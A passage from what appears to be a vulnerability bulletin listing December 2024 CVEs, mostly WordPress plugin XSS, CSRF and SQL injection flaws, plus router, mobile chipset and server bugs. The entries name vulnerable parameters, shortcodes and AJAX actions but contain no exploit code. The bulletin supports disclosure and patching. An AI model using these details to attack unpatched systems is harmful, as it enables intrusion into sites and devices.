The The Pojo Forms plugin for WordPress is vulnerable to arbitrary shortcode execution via form_preview_shortcode AJAX action in all versions up to, and including, 1.4.7. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary shortcodes. This was partially fixed in version 1.4.8. | 2024-12-06 | 6.3 | CVE-2024-10909 |
| Rockwell Automation--Arena |
An "uninitialized variable" code execution vulnerability exists in the Rockwell Automation Arena® that could allow a threat actor to craft a DOE file and force the software to access a variable before it being initialized. If exploited, a threat actor could leverage this vulnerability to execute arbitrary code. To exploit this vulnerability, a legitimate user must execute the malicious code crafted by the threat actor. | 2024-12-05 | 6.7 | CVE-2024-11158 |
| GoodLayers--Goodlayers Core |
The Goodlayers Core plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'font-family' parameter in all versions up to, and including, 2.0.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-03 | 6.1 | CVE-2024-11200 |
| wpexpertsio--myCred Exclusive Platform for Loyalty Points and Rewards Create Leaderboards, Ranks, Badges, Cashback Coupons, Referral Programs, WooCommerce & eCommerce wallet, Gamification Awards, and Achievements. |
The myCred - Loyalty Points and Rewards plugin for WordPress and WooCommerce - Give Points, Ranks, Badges, Cashback, WooCommerce rewards, and WooCommerce credits for Gamification plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mycred_send shortcode in all versions up to, and including, 2.7.5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-06 | 6.4 | CVE-2024-11201 |
| ultimatemember--ForumWP Forum & Discussion Board |
The ForumWP - Forum & Discussion Board plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'url' parameter in all versions up to, and including, 2.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-06 | 6.1 | CVE-2024-11204 |
| edgarrojas--PDF Builder for WooCommerce. Create invoices,packing slips and more |
The PDF Builder for WooCommerce. Create invoices,packing slips and more plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.2.136 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-06 | 6.1 | CVE-2024-11276 |
| bastho--Accounting for WooCommerce |
The Accounting for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 1.6.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-05 | 6.1 | CVE-2024-11324 |
| fatcatapps--Campaign Monitor Forms by Optin Cat |
The Campaign Monitor Forms by Optin Cat plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.5.7. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-03 | 6.1 | CVE-2024-11326 |
| comfino--Comfino Payment Gateway |
The Comfino Payment Gateway plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.1.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-07 | 6.1 | CVE-2024-11329 |
| dactum--Clickbank WordPress Plugin (Storefront) |
The Clickbank WordPress Plugin (Storefront) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7. This is due to missing or incorrect nonce validation via the cs_menu page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-06 | 6.1 | CVE-2024-11336 |
| devnethr--Smart PopUp Blaster |
The Smart PopUp Blaster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'spb-button' shortcode in all versions up to, and including, 1.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-06 | 6.4 | CVE-2024-11339 |
| cs123--TwentyTwenty |
The TwentyTwenty plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'twentytwenty' shortcode in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-06 | 6.4 | CVE-2024-11352 |
| matansmoove--Smoove connector for Elementor forms |
The Smoove connector for Elementor forms plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.1.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-07 | 6.1 | CVE-2024-11367 |
| nanard33--Splash Sync |
The Splash Sync plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.0.6. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-06 | 6.1 | CVE-2024-11368 |
| rezaplus--TWChat Send or receive messages from users |
The TWChat - Send or receive messages from users plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 4.0.4. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-07 | 6.1 | CVE-2024-11374 |
| edward_plainview--Broadcast |
The Broadcast plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'do_check' parameter in all versions up to, and including, 51.01 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This only affects multi-site installations. | 2024-12-06 | 6.1 | CVE-2024-11379 |
| imahui--Mini Program API |
The Mini Program API plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'qvideo' shortcode in all versions up to, and including, 1.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-07 | 6.4 | CVE-2024-11380 |
| creativethemeshq--Blocksy |
The Blocksy theme for WordPress is vulnerable to Stored Cross-Site Scripting via the Contact Info Block link parameter in all versions up to, and including, 2.0.77 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-05 | 6.4 | CVE-2024-11420 |
| genetechproducts--Drag & Drop Builder, Human Face Detector, Pre-built Templates, Spam Protection, User Email Notifications & more! |
The Drag & Drop Builder, Human Face Detector, Pre-built Templates, Spam Protection, User Email Notifications & more! plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.4.19 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-07 | 6.1 | CVE-2024-11436 |
| onlyoffice--ONLYOFFICE Docs |
The ONLYOFFICE Docs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'onlyoffice' shortcode in all versions up to, and including, 2.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-06 | 6.4 | CVE-2024-11450 |
| harshitpeer--Zooom |
The Zooom plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'zooom' shortcode in all versions up to, and including, 1.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-07 | 6.4 | CVE-2024-11451 |
| samdani--WordPress Pinterest Plugin Make a Popup, User Profile, Masonry and Gallery Layout |
The WordPress Pinterest Plugin - Make a Popup, User Profile, Masonry and Gallery Layout plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gs_pin_widget' shortcode in all versions up to, and including, 1.8.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-03 | 6.4 | CVE-2024-11453 |
| spartac--Feedpress Generator External RSS Frontend Customizer |
The Feedpress Generator - External RSS Frontend Customizer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 1.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-07 | 6.1 | CVE-2024-11457 |
| taunoh--Form Data Collector |
The Form Data Collector plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.2.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-03 | 6.1 | CVE-2024-11461 |
| alphabposervice--Easy Code Snippets |
The Easy Code Snippets plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-07 | 6.1 | CVE-2024-11464 |
| tomasgroulik--Intro Tour Tutorial DeepPresentation |
The Intro Tour Tutorial DeepPresentation plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 6.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-04 | 6.1 | CVE-2024-11466 |
| martinnguyen1990--Next-Cart Store to WooCommerce Migration |
The Next-Cart Store to WooCommerce Migration plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 3.9.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-06 | 6.1 | CVE-2024-11687 |
| wphocus--My auctions allegro |
The My auctions allegro plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 3.6.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-03 | 6.1 | CVE-2024-11707 |
| iqonicdesign--KiviCare Clinic & Patient Management System (EHR) |
The KiviCare - Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'service_list[0][service_id]' parameter of the get_widget_payment_options AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Custom-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-06 | 6.5 | CVE-2024-11729 |
| iqonicdesign--KiviCare Clinic & Patient Management System (EHR) |
The KiviCare - Clinic & Patient Management System (EHR) plugin for WordPress is vulnerable to SQL Injection via the 'sort[]' parameter of the static_data_list AJAX action in all versions up to, and including, 3.6.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with doctor/receptionist-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-06 | 6.5 | CVE-2024-11730 |
| venutius--BP Profile Shortcodes Extra |
The BP Profile Shortcodes Extra plugin for WordPress is vulnerable to time-based SQL Injection via the 'tab' parameter in all versions up to, and including, 2.6.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. | 2024-12-03 | 6.5 | CVE-2024-11732 |
| wpenhanced--Responsive Videos |
The Responsive Videos plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'somryv' shortcode in all versions up to, and including, 2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-04 | 6.4 | CVE-2024-11747 |
| floristone--Flower Delivery by Florist One |
The Flower Delivery by Florist One plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'flower-delivery' shortcode in all versions up to, and including, 3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-04 | 6.4 | CVE-2024-11769 |
| alexvtn--WIP WooCarousel Lite |
The WIP WooCarousel Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wip_woocarousel_products_carousel' shortcode in all versions up to, and including, 1.1.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-05 | 6.4 | CVE-2024-11779 |
| brandtoss--WP Mailster |
The WP Mailster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mst_subscribe' shortcode in all versions up to, and including, 1.8.17.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-03 | 6.4 | CVE-2024-11782 |
| soraco--Quick License Manager WooCommerce Plugin |
The Quick License Manager - WooCommerce Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'submit_qlm_products' parameter in all versions up to, and including, 2.4.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-03 | 6.1 | CVE-2024-11805 |
| calliko--NPS computy |
The NPS computy plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'data1' and 'data2' parameters in all versions up to, and including, 2.8.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-04 | 6.1 | CVE-2024-11807 |
| aminshah74--Pulsating Chat Button |
The Pulsating Chat Button plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.6. This is due to missing or incorrect nonce validation on the amin_chat_button_settings_page() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-04 | 6.1 | CVE-2024-11813 |
| algoritmika--Additional Custom Order Status for WooCommerce |
The Additional Custom Order Status for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the wfwp_wcos_delete_finished, wfwp_wcos_delete_fallback_finished, wfwp_wcos_delete_fallback_orders_updated, and wfwp_wcos_delete_fallback_status parameters in all versions up to, and including, 1.6.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-04 | 6.1 | CVE-2024-11814 |
| vjalby--Folder Gallery |
The Folder Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'foldergallery' shortcode in all versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-06 | 6.1 | CVE-2024-11823 |
| mlaza--jAlbum Bridge |
The jAlbum Bridge plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'ar' parameter in all versions up to, and including, 2.0.15 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-03 | 6.4 | CVE-2024-11853 |
| webilia--Listdom Business Directory and Classified Ads Listings WordPress Plugin |
The Listdom - Business Directory and Classified Ads Listings WordPress Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'shortcode' parameter in all versions up to, and including, 3.7.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-04 | 6.4 | CVE-2024-11854 |
| paulnagle--BMLT Tabbed Map |
The BMLT Tabbed Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bmlt_tabbed_map' shortcode in all versions up to, and including, 1.1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-03 | 6.4 | CVE-2024-11866 |
| bplugins--B Testimonial Testimonial plugin for WP |
The B Testimonial - testimonial plugin for WP plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'b_testimonial' shortcode in all versions up to, and including, 1.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-04 | 6.4 | CVE-2024-11880 |
| mightyforms--Contact Form, Survey & Form Builder MightyForms |
The Contact Form, Survey & Form Builder - MightyForms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mightyforms' shortcode in all versions up to, and including, 1.3.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-04 | 6.4 | CVE-2024-11897 |
| akashmalik--Scratch & Win Giveaways and Contests. Boost subscribers, traffic, repeat visits, referrals, sales and more |
The Scratch & Win - Giveaways and Contests. Boost subscribers, traffic, repeat visits, referrals, sales and more plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'swin-campaign' shortcode in all versions up to, and including, 2.6.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-03 | 6.4 | CVE-2024-11898 |
| timsayshey--WP eCards |
The WP eCards plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'ecard' shortcode in all versions up to, and including, 1.3.904 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-04 | 6.4 | CVE-2024-11903 |
| codemstory-- |
The 코드엠샵 소셜톡 plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'msntt_add_plus_talk' shortcode in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-07 | 6.4 | CVE-2024-11904 |
| neotrendy--Email Address Obfuscation |
The Email Address Obfuscation plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' parameter in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2024-12-04 | 6.4 | CVE-2024-11935 |
| codemstory-- |
The 워드프레스 결제 심플페이 - 우커머스 결제 플러그인 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 5.2.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-07 | 6.1 | CVE-2024-11943 |
| mikeyott--WP System |
The WP System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.1. This is due to missing or incorrect nonce validation on the generate_wp_system_page_content() function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-12-06 | 6.1 | CVE-2024-12003 |
| francescosganga--WP Media Optimizer (.webp) |
The WP Media Optimizer (.webp) plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'wpmowebp-css-resources' and 'wpmowebp-js-resources' parameters in all versions up to, and including, 1.4.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-06 | 6.1 | CVE-2024-12060 |
| nshowketgmailcom--Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal |
The Simple Ecommerce Shopping Cart Plugin- Sell products through Paypal plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'monthly_sales_current_year' parameter in all versions up to, and including, 3.1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-07 | 6.1 | CVE-2024-12128 |
| n/a--horilla |
A vulnerability classified as critical was found in horilla up to 1.2.1. This vulnerability affects the function request_new/get_employee_shift/create_reimbursement/key_result_current_value_update/create_meetings/create_skills. The manipulation leads to deserialization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-04 | 6.3 | CVE-2024-12138 |
| Netgear--R6900 |
A vulnerability was found in Netgear R6900 1.0.1.26_1.0.20. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file upgrade_check.cgi of the component HTTP Header Handler. The manipulation of the argument Content-Length leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2024-12-04 | 6.5 | CVE-2024-12147 |
| tsjippy--Mollie for Contact Form 7 |
The Mollie for Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 5.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-07 | 6.1 | CVE-2024-12165 |
| cmorillas1--Shortcodes Blocks Creator Ultimate |
The Shortcodes Blocks Creator Ultimate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-07 | 6.1 | CVE-2024-12166 |
| cmorillas1--Shortcodes Blocks Creator Ultimate |
The Shortcodes Blocks Creator Ultimate plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the '_wpnonce' parameter in all versions up to, and including, 2.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-07 | 6.1 | CVE-2024-12167 |
| Devolutions--Server |
Incorrect authorization in the permission component in Devolutions Server 2024.3.7.0 and earlier allows an authenticated user to view the password history of an entry without the view password permission. | 2024-12-04 | 6.5 | CVE-2024-12196 |
| Shenzhen Dashi Tongzhou Information Technology--AgileBPM |
A vulnerability was found in Shenzhen Dashi Tongzhou Information Technology AgileBPM up to 1.0.0. It has been declared as critical. Affected by this vulnerability is the function doFilter of the file \agile-bpm-basic-master\ab-auth\ab-auth-spring-security-oauth2\src\main\java\com\dstz\auth\filter\AuthorizationTokenCheckFilter.java. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. | 2024-12-05 | 6.3 | CVE-2024-12235 |
| cardgate--CardGate Payments for WooCommerce |
The CardGate Payments for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'page' parameter in all versions up to, and including, 3.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2024-12-07 | 6.1 | CVE-2024-12257 |
| Jirafeau project--Jirafeau |
Jirafeau normally prevents browser preview for SVG files due to the possibility that manipulated SVG files could be exploited for cross site scripting. This was done by storing the MIME type of a file and preventing the browser preview for MIME type image/svg+xml. This issue was first reported in CVE-2022-30110. However, it was still possible to do a browser preview of a SVG file by sending a manipulated MIME type during the upload, where the case of any letter in image/svg+xml had been changed (like image/svg+XML). The check for image/svg+xml has been changed to be case insensitive. | 2024-12-06 | 6.1 | CVE-2024-12326 |
| TP-Link--VN020 F3v(T) |
A vulnerability was found in TP-Link VN020 F3v(T) TT_V6.2.1021. It has been rated as critical. This issue affects some unknown processing of the file /control/WANIPConnection of the component Incomplete SOAP Request Handler. The manipulation leads to denial of service. The attack can only be initiated within the local network. The exploit has been disclosed to the public and may be used. | 2024-12-08 | 6.5 | CVE-2024-12342 |
| TP-Link--VN020 F3v(T) |
A vulnerability classified as critical has been found in TP-Link VN020 F3v(T) TT_V6.2.1021. Affected is an unknown function of the file /control/WANIPConnection of the component SOAP Request Handler. The manipulation of the argument NewConnectionType leads to buffer overflow. The attack needs to be done within the local network. The exploit has been disclosed to the public and may be used. | 2024-12-08 | 6.5 | CVE-2024-12343 |
| TP-Link--VN020 F3v(T) |
A vulnerability, which was classified as critical, was found in TP-Link VN020 F3v(T) TT_V6.2.1021. This affects an unknown part of the component FTP USER Command Handler. The manipulation leads to memory corruption. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. | 2024-12-08 | 6.3 | CVE-2024-12344 |
| MediaTek, Inc.--MT6580, MT6761, MT6765, MT6768, MT6779, MT6781, MT6785, MT6789, MT6833, MT6835, MT6853, MT6855, MT6873, MT6877, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6983, MT6985, MT8175, MT8195, MT8321, MT8365, MT8370, MT8385, MT8390, MT8395, MT8666, MT8667, MT8673, MT8765, MT8766, MT8768, MT8771, MT8781, MT8786, MT8788, MT8791T, MT8797, MT8798 |
In vdec, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege if a malicious actor has already obtained System privileges. User interaction is not needed for exploitation. Patch ID: ALPS09046782; Issue ID: MSV-1728. | 2024-12-02 | 6.7 | CVE-2024-20125 |
| MediaTek, Inc.--MT6739, MT6761, MT6765, MT6768, MT6781, MT6789, MT6833, MT6835, MT6853, MT6855, MT6877, MT6878, MT6879, MT6883, MT6885, MT6886, MT6889, MT6893, MT6895, MT6896, MT6897, MT6983, MT6985, MT6989, MT8195, MT8676, MT8678, MT8696, MT8796 |
In power, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09193374; Issue ID: MSV-1982. | 2024-12-02 | 6.7 | CVE-2024-20130 |
| MediaTek, Inc.--MT2737, MT2739, MT6789, MT6813, MT6815, MT6835, MT6835T, MT6855, MT6878, MT6878T, MT6879, MT6886, MT6895, MT6895T, MT6896, MT6897, MT6899, MT6980, MT6980D, MT6983, MT6985, MT6986, MT6986D, MT6988, MT6989, MT6990, MT6991, MT8673, MT8676, MT8795T, MT8798 |
In Modem, there is a possible escalation of privilege due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01395886; Issue ID: MSV-1873. | 2024-12-02 | 6.7 | CVE-2024-20131 |
| MediaTek, Inc.--MT2737, MT6298, MT6879, MT6886, MT6895, MT6895T, MT6896, MT6980, MT6980D, MT6983, MT6985, MT6989, MT6990, MT8673, MT8676, MT8795T, MT8798 |
In Modem, there is a possible out of bonds write due to a mission bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00957388; Issue ID: MSV-1872. | 2024-12-02 | 6.7 | CVE-2024-20132 |
| MediaTek, Inc.--MT6879, MT6886, MT6895, MT6895T, MT6896, MT6980, MT6983, MT8673, MT8676, MT8795T, MT8798 |
In Modem, there is a possible escalation of privilege due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01395886; Issue ID: MSV-1871. | 2024-12-02 | 6.7 | CVE-2024-20133 |
| MediaTek, Inc.--MT6835, MT6878, MT6879, MT6895, MT6896, MT6897, MT6983, MT6985, MT6989, MT8755, MT8775, MT8796, MT8798 |
In ril, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS09154589; Issue ID: MSV-1866. | 2024-12-02 | 6.7 | CVE-2024-20134 |
| MediaTek, Inc.--MT6768, MT6781, MT6833, MT6853, MT6877, MT6878, MT6893, MT6897, MT6989, MT8775, MT8796, MT9687 |
